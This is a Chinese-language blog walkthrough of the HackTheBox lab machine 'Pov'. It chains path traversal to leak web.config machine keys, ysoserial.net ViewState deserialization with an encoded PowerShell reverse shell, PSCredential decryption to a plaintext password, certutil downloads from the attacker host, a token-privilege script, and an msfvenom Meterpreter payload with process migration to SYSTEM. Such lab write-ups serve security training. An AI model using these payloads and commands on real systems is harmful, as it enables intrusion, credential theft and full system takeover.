rev1ve's blog
0%

Pov

发表于 更新于 分类于 阅读次数: Valine:

AST.NET框架ViewState参数攻击、LFI本地文件包含漏洞、ysoserial反序列化漏洞、SeDebugPrivilege提权

Pov

信息搜集

1
nmap -sV -sC -v --min-rate 1000 10.10.11.251

扫描结果

1
2
3
4
5
PORT   STATE SERVICE    VERSION
80/tcp open  tcpwrapped
|_http-title: pov.htb
| http-methods: 
|_  Supported Methods: GET HEAD

我们将域名pov.htb添加到/etc/hosts方便访问

打开后发现是企业网站,扫出来子域名dev.pov.htb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
gobuster vhost -u http://pov.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://pov.htb
[+] Method:          GET
[+] Threads:         10
[+] Wordlist:        /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev.pov.htb Status: 302 [Size: 152] [--> http://dev.pov.htb/portfolio/]

那么我们修改下/etc/hosts的域名,成功访问

我们注意到有文件下载功能,尝试文件读取

但是并不能读取一些常见的敏感文件路径

我们利用wappalyzer插件扫描出web框架为AST.NET的4.0版本,并且上述请求中的参数也是相关联

网上搜到如何利用__VIEWSTATE 参考文章

什么是 ViewState

ViewState 是 ASP.NET 中用于维护页面和控制网页数据的默认机制。在呈现页面的 HTML 期间,页面的当前状态和回发期间要保留的值将序列化为 base64 编码的字符串。然后,这些字符串将放置在隐藏的 ViewState 字段中。

ViewState 信息可以通过以下属性或其组合来表征:

  • 基数64:当 EnableViewStateMacViewStateEncryptionMode 属性都设置为 false 时,将使用此格式。

  • Base64 + MAC(消息认证码)已启用:通过将 EnableViewStateMac 属性设置为 true 来实现 MAC 的激活。这为 ViewState 数据提供完整性验证。

  • Base64 + 加密:当 ViewStateEncryptionMode 属性设置为 true 时,将应用加密,以确保 ViewState 数据的机密性。

文章提到在版本4.5以及EnableViewStateMac=true & ViewStateEncryptionMode=false情况下,密钥在web.config文件上

(由于../被过滤,直接双写绕过)

web.config

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<configuration>
  <system.web>
    <customErrors mode="On" defaultRedirect="default.aspx" />
    <httpRuntime targetFramework="4.5" />
    <machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
  </system.web>
    <system.webServer>
        <httpErrors>
            <remove statusCode="403" subStatusCode="-1" />
            <error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" />
        </httpErrors>
        <httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" />
    </system.webServer>
</configuration>

使用 YSoSerial.Net 攻击 工具链接

1
./ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "ping 10.10.14.46" --apppath="/" --path="/portfolio/default.aspx" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"

注意:如果有发送参数 _VIEWSTATEGENERATOR ,用 --generator=8E0F0FA3 替换--apppath="/" --path="/portfolio/default.aspx"。实际上bp抓包可以看到确实有,但是换成--generator参数却不行

在windows系统生成payload

复制到bp上,并且在本地监听tun0(即10.10.14.46)的流量

1
sudo tcpdump -i tun0 icmp

成功命令执行

经过一番尝试,发现bash的反弹shell无法成功,那么猜测是目标机器为windows

用powershell去弹 脚本链接

然后再生成payload放到bp上

1
./ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANAA2ACIALAAxADAAMgA4ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" --apppath="/" --path="/portfolio/default.aspx" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"

成功反弹shell

经过一番查找在C:\Users\sfitz\Documents路径下发现有用信息

1
2
3
4
5
6
7
8
9
10
11
12
13
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">alaading</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6</SS>
    </Props>
  </Obj>
</Objs>

利用powershell语法解密将password转换成明文 参考文章

1
$cred = Import-CliXml -Path connection.xml; $cred.GetNetworkCredential() | Format-List *

成功得到密码

1
2
3
4
5
PS C:\Users\sfitz\Documents> $cred = Import-CliXml -Path connection.xml; $cred.GetNetworkCredential() | Format-List *
UserName       : alaading
Password       : f8gQ8fynP44ek1m3
SecurePassword : System.Security.SecureString
Domain         :

接下来我们使用RunasCs进行用户切换

首先切换到Downloads目录,然后下载本地的RunasCs文件

1
certutil -urlcache -split -f http://10.10.14.46/RunasCs.exe

然后切换用户并弹shell到777端口

1
./RunasCs.exe alaading f8gQ8fynP44ek1m3 powershell.exe -r 10.10.14.46:777

重点:这里用powershell弹,如果用cmd.exe到后面会发现没有SeDebugPrivilege权限

得到user的flag

查看下当前用户权限

1
2
3
4
5
6
7
8
9
10
PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeDebugPrivilege              Debug programs                 Enabled 
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

SeDebugPrivilege

在Windows操作系统中,SeDebugPrivilege是一种特别强大的权限,可以让持有该权限的进程读取或修改几乎所有其他进程的内存空间,即使是那些以系统或管理员级别运行的进程。在Metasploit框架下,拥有了这个权限,就可以对系统的SAM数据库进行读取

由于靶机SeDebugPrivilegeenabled,所以我们就直接提权就行了

若要启动该权限,需要执行下面脚本 参考文章

EnableAllTokenPrivs.ps1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71

## All Credit goes to Lee Holmes (@Lee_Holmes on twitter).  I found the code here https://www.leeholmes.com/blog/2010/09/24/adjusting-token-privileges-in-powershell/
$definition = @'
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;

namespace Set_TokenPermission
{
    public class SetTokenPriv
    {
        [DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)]
        internal static extern bool AdjustTokenPrivileges(IntPtr htok, bool disall,
        ref TokPriv1Luid newst, int len, IntPtr prev, IntPtr relen);
        [DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)]
        internal static extern bool OpenProcessToken(IntPtr h, int acc, ref IntPtr phtok);
        [DllImport("advapi32.dll", SetLastError = true)]
        internal static extern bool LookupPrivilegeValue(string host, string name, ref long pluid);
        [StructLayout(LayoutKind.Sequential, Pack = 1)]
        internal struct TokPriv1Luid
        {
            public int Count;
            public long Luid;
            public int Attr;
        }
        internal const int SE_PRIVILEGE_ENABLED = 0x00000002;
        internal const int SE_PRIVILEGE_DISABLED = 0x00000000;
        internal const int TOKEN_QUERY = 0x00000008;
        internal const int TOKEN_ADJUST_PRIVILEGES = 0x00000020;
        public static void EnablePrivilege()
        {
            bool retVal;
            TokPriv1Luid tp;
            IntPtr hproc = new IntPtr();
            hproc = Process.GetCurrentProcess().Handle;
            IntPtr htok = IntPtr.Zero;

            List<string> privs = new List<string>() {  "SeAssignPrimaryTokenPrivilege", "SeAuditPrivilege", "SeBackupPrivilege",
            "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege", "SeCreatePagefilePrivilege",
            "SeCreatePermanentPrivilege", "SeCreateSymbolicLinkPrivilege", "SeCreateTokenPrivilege",
            "SeDebugPrivilege", "SeEnableDelegationPrivilege", "SeImpersonatePrivilege", "SeIncreaseBasePriorityPrivilege",
            "SeIncreaseQuotaPrivilege", "SeIncreaseWorkingSetPrivilege", "SeLoadDriverPrivilege",
            "SeLockMemoryPrivilege", "SeMachineAccountPrivilege", "SeManageVolumePrivilege",
            "SeProfileSingleProcessPrivilege", "SeRelabelPrivilege", "SeRemoteShutdownPrivilege",
            "SeRestorePrivilege", "SeSecurityPrivilege", "SeShutdownPrivilege", "SeSyncAgentPrivilege",
            "SeSystemEnvironmentPrivilege", "SeSystemProfilePrivilege", "SeSystemtimePrivilege",
            "SeTakeOwnershipPrivilege", "SeTcbPrivilege", "SeTimeZonePrivilege", "SeTrustedCredManAccessPrivilege",
            "SeUndockPrivilege", "SeUnsolicitedInputPrivilege", "SeDelegateSessionUserImpersonatePrivilege" };


            

            retVal = OpenProcessToken(hproc, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, ref htok);
            tp.Count = 1;
            tp.Luid = 0;
            tp.Attr = SE_PRIVILEGE_ENABLED;

            foreach (var priv in privs)
            {
                retVal = LookupPrivilegeValue(null, priv, ref tp.Luid);
                retVal = AdjustTokenPrivileges(htok, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);                              
            }
        }
    }  
}
'@

$type = Add-Type $definition -PassThru
$type[0]::EnablePrivilege() 2>&1

在本地开启http服务上传该脚本文件

1
certutil -urlcache -split -f http://10.10.14.46/EnableAllTokenPrivs.ps1

然后.\EnableAllTokenPrivs.ps1即可

回到题目,我们利用msf先在本地生成马

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.46 LPORT=5555 -f exe > exploit.exe

然后本地开启http服务,上传到靶机

1
certutil -urlcache -split -f http://10.10.14.46/exploit.exe

在本地启动一个msf数据库&console

1
sudo msfdb init && msfconsole

接着依次执行去反弹shell

1
2
3
4
5
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.46
set LPORT 5555
run

开启监听后在靶机运行.\exploit.exe,反弹成功

我们ps查看下靶机正在运行的进程,注意到winlogon.exe文件

winlogon.exe 是 Windows 的登录系统进程,它在用户登录时启动,并处理用户登录和注销的过程。当用户输入用户名和密码后,winlogon.exe 验证用户的凭据,并启动用户环境。它还负责加载用户配置文件、启动用户的用户界面和其他关联的系统任务。

然后使用migrate 548命令将shell移到winlogon.exe进程里

执行shell命令,成功提权拿到flag